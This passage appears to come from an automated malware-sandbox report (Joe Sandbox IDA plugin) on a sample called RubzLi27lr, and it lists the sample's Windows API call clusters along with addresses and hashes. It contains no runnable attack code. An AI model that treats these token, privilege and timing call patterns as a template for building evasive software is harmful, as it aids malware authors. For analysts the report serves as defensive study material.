                                                                                                                  • Opcode ID: 001edfd6ae8fcaca020abfc2301dfd5a268d1961c3838ed410f1fabdd4e65a42
                                                                                                                  • Instruction ID: b368abf7d95338993d41a792df2ab669625c29f677fd9150ce6831b933e427aa
                                                                                                                  • Opcode Fuzzy Hash: 001edfd6ae8fcaca020abfc2301dfd5a268d1961c3838ed410f1fabdd4e65a42
                                                                                                                  • Instruction Fuzzy Hash: 0E21AD35601018AFDF25CF98C859EFB3BF9FB4A750F004099F90547261CB319A51EB60
                                                                                                                  APIs
                                                                                                                  • GetFileAttributesW.KERNEL32(?,00B4CB68), ref: 00B1D2FB
                                                                                                                  • GetLastError.KERNEL32 ref: 00B1D30A
                                                                                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 00B1D319
                                                                                                                  • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00B4CB68), ref: 00B1D376
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2267087916-0
                                                                                                                  • Opcode ID: 49bed3a02c24552d8762bc53d15d515192c23178faeb67e9838cc3b4309ec9fb
                                                                                                                  • Instruction ID: 8120eeb03bc17ebf36f3526bb2a6b7e545eb5d645d5737fa80499b06bfdedfd4
                                                                                                                  • Opcode Fuzzy Hash: 49bed3a02c24552d8762bc53d15d515192c23178faeb67e9838cc3b4309ec9fb
                                                                                                                  • Instruction Fuzzy Hash: 6521D3705052019F8700DF28D8814EB7BE8FE56724FA04A5DF4A9C32A2DB30DA86CB97
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00B11014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00B1102A
                                                                                                                    • Part of subcall function 00B11014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00B11036
                                                                                                                    • Part of subcall function 00B11014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B11045
                                                                                                                    • Part of subcall function 00B11014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00B1104C
                                                                                                                    • Part of subcall function 00B11014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B11062
                                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00B115BE
                                                                                                                  • _memcmp.LIBVCRUNTIME ref: 00B115E1
                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B11617
                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 00B1161E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1592001646-0
                                                                                                                  • Opcode ID: 9d3e9e2e8a1bceeab06d95a0eaa41c2080bc7113f81abe03445b4d5243c8fc0a
                                                                                                                  • Instruction ID: 295589b9abc4920b6ad8c5466bd8bcdb44f9793aaea0101b85acc063a154db7e
                                                                                                                  • Opcode Fuzzy Hash: 9d3e9e2e8a1bceeab06d95a0eaa41c2080bc7113f81abe03445b4d5243c8fc0a
                                                                                                                  • Instruction Fuzzy Hash: 0C218C31E01108EFDF00DFA8C945BEEB7F9EF84344F584899E541AB241E731AA85CBA0
                                                                                                                  APIs
                                                                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 00B4280A
                                                                                                                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00B42824
                                                                                                                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00B42832
                                                                                                                  • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00B42840
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$Long$AttributesLayered
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2169480361-0
APIs
  • Part of subcall function 00B18D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00B1790A,?,000000FF,?,00B18754,00000000,?,0000001C,?,?), ref: 00B18D8C
  • Part of subcall function 00B18D7D: lstrcpyW.KERNEL32(00000000,?,?,00B1790A,?,000000FF,?,00B18754,00000000,?,0000001C,?,?,00000000), ref: 00B18DB2
  • Part of subcall function 00B18D7D: lstrcmpiW.KERNEL32(00000000,?,00B1790A,?,000000FF,?,00B18754,00000000,?,0000001C,?,?), ref: 00B18DE3
• lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00B18754,00000000,?,0000001C,?,?,00000000), ref: 00B17923
• lstrcpyW.KERNEL32(00000000,?,?,00B18754,00000000,?,0000001C,?,?,00000000), ref: 00B17949
• lstrcmpiW.KERNEL32(00000002,cdecl,?,00B18754,00000000,?,0000001C,?,?,00000000), ref: 00B17984
Similarity
• API ID: lstrcmpilstrcpylstrlen
• String ID: cdecl
• API String ID: 4031866154-3896280584
APIs
• GetWindowLongW.USER32(?,000000F0), ref: 00B47D0B
• SetWindowLongW.USER32(00000000,000000F0,?), ref: 00B47D2A
• SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00B47D42
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00B2B7AD,00000000), ref: 00B47D6B
  • Part of subcall function 00AC9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00AC9BB2
Similarity
• API ID: Window$Long
• String ID:
• API String ID: 847901565-0
APIs
• SendMessageW.USER32(?,00001060,?,00000004), ref: 00B456BB
• _wcslen.LIBCMT ref: 00B456CD
• _wcslen.LIBCMT ref: 00B456D8
• SendMessageW.USER32(?,00001002,00000000,?), ref: 00B45816
Similarity
• API ID: MessageSend_wcslen
• String ID:
• API String ID: 455545452-0
APIs
• SendMessageW.USER32(?,000000B0,?,?), ref: 00B11A47
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 00B11A59
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 00B11A6F
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 00B11A8A
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
APIs
• GetCurrentThreadId.KERNEL32 ref: 00B1E1FD
• MessageBoxW.USER32(?,?,?,?), ref: 00B1E230
• WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00B1E246
• CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00B1E24D
Similarity
• API ID: CloseCurrentHandleMessageObjectSingleThreadWait
• String ID:
• API String ID: 2880819207-0
APIs
• CreateThread.KERNEL32(00000000,?,00ADCFF9,00000000,00000004,00000000), ref: 00ADD218
• GetLastError.KERNEL32 ref: 00ADD224
• __dosmaperr.LIBCMT ref: 00ADD22B
• ResumeThread.KERNEL32(00000000), ref: 00ADD249
Similarity
• API ID: Thread$CreateErrorLastResume__dosmaperr
• String ID:
• API String ID: 173952441-0
APIs
• SetTextColor.GDI32(?,?), ref: 00AC98D6
• SetBkMode.GDI32(?,00000001), ref: 00AC98E9
• GetStockObject.GDI32(00000005), ref: 00AC98F1
• GetWindowLongW.USER32(?,000000EB), ref: 00AC9952
                                                                                                                  Similarity
                                                                                                                  • API ID: ColorLongModeObjectStockTextWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2960364272-0
                                                                                                                  • Opcode ID: 23dd7f2d1062b341655ca24c3cd82529841405b0d9aaa986b0f8bfe22089011b
                                                                                                                  • Instruction ID: 4ec01e1d4ea7871f42e7ba9d0a7ebef2a3f4b04d80952fc2fcd8b0b0c2162553
                                                                                                                  • Opcode Fuzzy Hash: 23dd7f2d1062b341655ca24c3cd82529841405b0d9aaa986b0f8bfe22089011b
                                                                                                                  • Instruction Fuzzy Hash: 20116B3A1471808FD7128F24ECA9EE73F64EB5371171A019DE5829B2B3CA310A02DF61
APIs
  • Part of subcall function 00AC9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00AC9BB2
• GetClientRect.USER32(?,?), ref: 00B49F31
• GetCursorPos.USER32(?), ref: 00B49F3B
• ScreenToClient.USER32(?,?), ref: 00B49F46
• DefDlgProcW.USER32(?,00000020,?,00000000,?,?,?), ref: 00B49F7A
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: Client$CursorLongProcRectScreenWindow
• String ID:
• API String ID: 4127811313-0
• Opcode ID: b642b13f4a4cacd3ddc0da37635fa8a0695df46c074f631ec239f8a999a1debe
• Instruction ID: b215272a618aec54753bee27c944fd82fb4fd05f1bcdeb0d926f9a7dc23e47b2
• Opcode Fuzzy Hash: b642b13f4a4cacd3ddc0da37635fa8a0695df46c074f631ec239f8a999a1debe
• Instruction Fuzzy Hash: BD11483690111AABDB00DF68D88A9EF7BB8FB46711F000495F911E3151DB30BF86DBA1
APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00AB604C
• GetStockObject.GDI32(00000011), ref: 00AB6060
• SendMessageW.USER32(00000000,00000030,00000000), ref: 00AB606A
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: CreateMessageObjectSendStockWindow
• String ID:
• API String ID: 3970641297-0
• Opcode ID: 44399b2dcf2b8f212be99c80133408ec6674645620b259d2540481224be7d0b6
• Instruction ID: bc98c09ad8ae9ccdbda27a7f655a15d6755c6f65e7092d44be37b16ff11c1c67
• Opcode Fuzzy Hash: 44399b2dcf2b8f212be99c80133408ec6674645620b259d2540481224be7d0b6
• Instruction Fuzzy Hash: 9411AD72102508BFEF125FA58C44EFABF6DFF097A5F044205FA0452022DB369C60DBA0
APIs
• ___BuildCatchObject.LIBVCRUNTIME ref: 00AD3B56
  • Part of subcall function 00AD3AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00AD3AD2
  • Part of subcall function 00AD3AA3: ___AdjustPointer.LIBCMT ref: 00AD3AED
• _UnwindNestedFrames.LIBCMT ref: 00AD3B6B
• __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00AD3B7C
• CallCatchBlock.LIBVCRUNTIME ref: 00AD3BA4
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
• String ID:
• API String ID: 737400349-0
• Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
• Instruction ID: 1b06bfc43d7b2fdfd570aea24095507482a19626668498f1402b5cf15979eb74
• Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
• Instruction Fuzzy Hash: EE012933100148BBDF126F95CD46EEB3B69EF48794F04401AFE5956221C732E961EBA1
APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00AB13C6,00000000,00000000,?,00AE301A,00AB13C6,00000000,00000000,00000000,?,00AE328B,00000006,FlsSetValue), ref: 00AE30A5
• GetLastError.KERNEL32(?,00AE301A,00AB13C6,00000000,00000000,00000000,?,00AE328B,00000006,FlsSetValue,00B52290,FlsSetValue,00000000,00000364,?,00AE2E46), ref: 00AE30B1
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00AE301A,00AB13C6,00000000,00000000,00000000,?,00AE328B,00000006,FlsSetValue,00B52290,FlsSetValue,00000000), ref: 00AE30BF
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: LibraryLoad$ErrorLast
• String ID:
• API String ID: 3177248105-0
• Opcode ID: e6c990ae29e61eaf0abf33d5b75c8ff953ee82219ff50317ecc94083336115f0
• Instruction ID: c9a5c8d3902474e1eedd31ac435e41bbb7b6e524abae9511f5aedb1257deb7ba
• Opcode Fuzzy Hash: e6c990ae29e61eaf0abf33d5b75c8ff953ee82219ff50317ecc94083336115f0
• Instruction Fuzzy Hash: 8601D037712262ABCF718B7BAC4CA677B98AF45B71B214620F905E7150DB21DE01C6D0
APIs
• GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 00B1747F
• LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00B17497
• RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00B174AC
• RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00B174CA
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: Type$Register$FileLoadModuleNameUser
• String ID:
• API String ID: 1352324309-0
• Opcode ID: 92d6373567db93aa65038cc37fd6711191c95867d17149de5baf08cce2f59117
• Instruction ID: 449cef0312ce811526f9d1420e977c73c6270a145cbf0e500cb2de9704a9ddde
• Opcode Fuzzy Hash: 92d6373567db93aa65038cc37fd6711191c95867d17149de5baf08cce2f59117
• Instruction Fuzzy Hash: 3A118EB52463109BE7208F14ED48BD27FFCEB00B00F5085A9A656D7251DF70EA84DB90
APIs
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00B1ACD3,?,00008000), ref: 00B1B0C4
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00B1ACD3,?,00008000), ref: 00B1B0E9
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00B1ACD3,?,00008000), ref: 00B1B0F3
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00B1ACD3,?,00008000), ref: 00B1B126
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: CounterPerformanceQuerySleep
• String ID:
• API String ID: 2875609808-0
• Opcode ID: 4bca52cf58e55a57f85b51667d2243dbc20e8ad6b399b86ae49937cef7d8076a
• Instruction ID: 622010cd27a902f985b749d96ef14e1cc9b21b0c63dc8e3347ff7686df5212a4
• Opcode Fuzzy Hash: 4bca52cf58e55a57f85b51667d2243dbc20e8ad6b399b86ae49937cef7d8076a
• Instruction Fuzzy Hash: 88113C31C01518E7CF009FE4E998AEEBFB8FF0A711F6140D5D951B3181CB3056908B51
APIs
• GetWindowRect.USER32(?,?), ref: 00B47E33
• ScreenToClient.USER32(?,?), ref: 00B47E4B
• ScreenToClient.USER32(?,?), ref: 00B47E6F
• InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B47E8A
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: ClientRectScreen$InvalidateWindow
• String ID:
• API String ID: 357397906-0
• Opcode ID: a2d2ece6004c168b0929c7ded7021d66f693eae9dc2e31bdb759b9930e8b4b2e
• Instruction ID: 8f6d65e9b77d8e7e1a6ddd1be26b6c27fa0ccb7268509d4716b54d400cc95f12
• Opcode Fuzzy Hash: a2d2ece6004c168b0929c7ded7021d66f693eae9dc2e31bdb759b9930e8b4b2e
• Instruction Fuzzy Hash: 3D1156B9D0020AAFDB41CF98C8849EEBBF9FF09310F509156E915E3210D735AA54CF50
APIs
• SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00B12DC5
• GetWindowThreadProcessId.USER32(?,00000000), ref: 00B12DD6
• GetCurrentThreadId.KERNEL32 ref: 00B12DDD
• AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00B12DE4
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
• String ID:
• API String ID: 2710830443-0
• Opcode ID: 9756e0e69bf12f5d35ef524ff4c3520d9a457fb23303cc98a4abdf02651bba81
• Instruction ID: e2f9f542e641647a40aed78caf299a24aebef76323229b1b62003bbfd18de48e
• Opcode Fuzzy Hash: 9756e0e69bf12f5d35ef524ff4c3520d9a457fb23303cc98a4abdf02651bba81
• Instruction Fuzzy Hash: C0E06D752022287ADB201BA2EC0DEEB3EACFB43FA1F514065B505D30809EA08A80C6B0
APIs
  • Part of subcall function 00AC9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00AC9693
  • Part of subcall function 00AC9639: SelectObject.GDI32(?,00000000), ref: 00AC96A2
  • Part of subcall function 00AC9639: BeginPath.GDI32(?), ref: 00AC96B9
  • Part of subcall function 00AC9639: SelectObject.GDI32(?,00000000), ref: 00AC96E2
• MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00B48887
• LineTo.GDI32(?,?,?), ref: 00B48894
• EndPath.GDI32(?), ref: 00B488A4
• StrokePath.GDI32(?), ref: 00B488B2
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
• String ID:
• API String ID: 1539411459-0
• Opcode ID: ce0f08216f237933ae89493fb14f07ac9f6eb97c80c23222b304d63dee02e47b
• Instruction ID: 071f5599872c680063f930632b176e7d072766bcb424fcac5140fe384f31df32
• Opcode Fuzzy Hash: ce0f08216f237933ae89493fb14f07ac9f6eb97c80c23222b304d63dee02e47b
• Instruction Fuzzy Hash: 2DF03A3A042258BADB125F98AC09FCE3F59AF06710F048140FA11661E2CB755612DBA9
APIs
• GetSysColor.USER32(00000008), ref: 00AC98CC
• SetTextColor.GDI32(?,?), ref: 00AC98D6
• SetBkMode.GDI32(?,00000001), ref: 00AC98E9
• GetStockObject.GDI32(00000005), ref: 00AC98F1
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: Color$ModeObjectStockText
• String ID:
• API String ID: 4037423528-0
• Opcode ID: 72fec19e6634c4548ef52a19530e1e17fc0069abb633d16f570c36d7b373cae7
• Instruction ID: 9f3883ebcbdadfc122143945da9124bb6bd8c5ab8edbdb6b6b6694c2e79d6c34
• Opcode Fuzzy Hash: 72fec19e6634c4548ef52a19530e1e17fc0069abb633d16f570c36d7b373cae7
• Instruction Fuzzy Hash: 00E0ED35680280AAEB200B74AC09BEC3F60FB12B32F048219F6FA690E1CB7147408B10
APIs
• GetCurrentThread.KERNEL32 ref: 00B11634
• OpenThreadToken.ADVAPI32(00000000,?,?,?,00B111D9), ref: 00B1163B
• GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00B111D9), ref: 00B11648
• OpenProcessToken.ADVAPI32(00000000,?,?,?,00B111D9), ref: 00B1164F
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: CurrentOpenProcessThreadToken
• String ID:
• API String ID: 3974789173-0
• Opcode ID: 99e883c99bb69a73461d179fc0901653edbb9155b5d8404de54beb915e996d1d
• Instruction ID: 3e250f367cef4c17787f65a5cad12ed93de9437ef3e08a464a99a828fb3492fc
• Opcode Fuzzy Hash: 99e883c99bb69a73461d179fc0901653edbb9155b5d8404de54beb915e996d1d
• Instruction Fuzzy Hash: 93E04F356022119BD7A01FA49D0DB863FA8FF46B91F144848F245CA090DA7445808B54
APIs
• GetDesktopWindow.USER32 ref: 00B0D858
• GetDC.USER32(00000000), ref: 00B0D862
• GetDeviceCaps.GDI32(00000000,0000000C), ref: 00B0D882
• ReleaseDC.USER32(?), ref: 00B0D8A3
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
